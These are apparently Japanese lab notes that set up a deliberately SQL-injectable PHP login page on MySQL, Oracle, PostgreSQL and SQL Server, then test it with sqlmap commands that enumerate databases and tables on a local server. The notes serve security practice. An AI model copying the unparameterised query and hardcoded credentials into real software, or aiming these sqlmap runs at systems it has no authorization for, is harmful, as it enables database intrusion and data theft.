(8.0.31)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://happyquality.com/2013/02/11/2587.htm
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
ls -l /etc/yum.repos.d/
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-pecl-mysql
php74 -i | grep mysqli
-- 2. Apacheインストール
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.66/info.php
-- 3. 攻撃対象サイト作成
mysql test
drop table users;
create table users(name varchar(30) ,pwd varchar(30) );
insert into users values('admin','admin');
select * from users;
exit
MYSQL_PWD='password' mysql -h localhost -u root test
exit
cd /var/www/html
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = mysqli_connect('localhost', 'root', 'password', 'test');
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
$rs = mysqli_query($con, $sql);
?>
<html>
<body>
<?php
if (mysqli_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
mysqli_close($con);
?>
</body>
</html>
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.66/sql_injection.html
-- 4. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables
(19c)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://nodachisoft.com/common/jp/article/jp000046/
https://www.php.net/manual/ja/function.oci-fetch-row.php
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-pear php74-php-devel php74-php-cli
※↓ エラー 「Cannot find sys/sdt.h which is required for DTrace support」回避のため追加インストール
yum -y install systemtap systemtap-runtime systemtap-sdt-devel
-- 2. Oracle Instant Clientインストール
yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-basic-19.17.0.0.0-1.x86_64.rpm
yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-devel-19.17.0.0.0-1.x86_64.rpm
-- 3. OCI8インストール
wget https://pecl.php.net/get/oci8-2.2.0.tgz
echo "extension=oci8.so" > /etc/opt/remi/php74/php.d/90_oci8.ini
export PHP_DTRACE=yes
C_INCLUDE_PATH=/usr/lib/oracle/19.17/client64 /opt/remi/php74/root/usr/bin/pecl install oci8-2.2.0.tgz
php74 -i | grep OCI
-- 4. Apacheインストール
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.65/info.php
-- 5. 攻撃対象サイト作成
su - oracle
sqlplus test/test@localhost:1521/pdb1.example.com
drop table users purge;
create table users(name varchar2(30) ,pwd varchar2(30) );
insert into users values('admin','admin');
commit;
select * from users;
exit
exit
cd /var/www/html
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = oci_connect('test', 'test', 'localhost:1521/pdb1.example.com');
$stid = oci_parse($con, "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
oci_execute($stid);
?>
<html>
<body>
<?php
if (oci_fetch_row($stid) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
oci_close($con);
?>
</body>
</html>
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.65/sql_injection.html
-- 6. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 7. 動作確認
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables
(15)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://www.server-world.info/query?os=Rocky_Linux_8&p=httpd&f=6
前提:
攻撃元と攻撃先は同一サーバ (OS: RL8)
DB作成済み
-- 1. phpインストール
dnf -y install https://rpms.remirepo.net/enterprise/remi-release-8.rpm
dnf repolist all
dnf -y search php74
dnf -y install php74 php74-php php74-php-pgsql
php74 -i | grep pgsql
-- 2. Apacheインストール
systemctl enable httpd php-fpm
systemctl restart httpd php-fpm
systemctl status httpd php-fpm
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.55/info.php
-- 3. 攻撃対象サイト作成
su - postgres
psql test
drop table users;
create table users(name varchar(30) ,pwd varchar(30) );
insert into users values('admin','admin');
select * from users;
alter user postgres with password 'postgres';
\q
PGPASSWORD=postgres psql -h localhost -d test -U postgres
\q
exit
cd /var/www/html
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = pg_connect("host=localhost dbname=test user=postgres password=postgres");
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
$rs = pg_query($con, $sql);
?>
<html>
<body>
<?php
if (pg_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
pg_close($con);
?>
</body>
</html>
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.55/sql_injection.html
-- 4. sqlmapインストール
dnf -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
python3 sqlmap.py --help
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2"
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --tables
(2019)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://stackoverflow.com/questions/31569675/pdo-equivalent-of-mysql-num-rows-or-mssql-num-rows
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-sqlsrv
php74 -i | grep PDO
-- 2. Apacheインストール
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.127/info.php
-- 3. 攻撃対象サイト作成
sqlcmd -S localhost -U SA -P 'password'
use test
drop table users;
create table users(name varchar(30) ,pwd varchar(30) );
insert into users values('admin','admin');
select * from users;
go
quit
cd /var/www/html
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$user = 'SA';
$pass = 'password';
$host = 'localhost';
$port = 1433;
$dbname = 'test';
$dsn = "sqlsrv:server=$host,$port;database=$dbname";
$con = new PDO($dsn, $user, $pass);
$pst = $con->query("SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
$result = $pst->fetchAll(PDO::FETCH_ASSOC);
?>
<html>
<body>
<?php
if (count($result) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
$con = null;
?>
</body>
</html>
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.127/sql_injection.html
-- 4. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables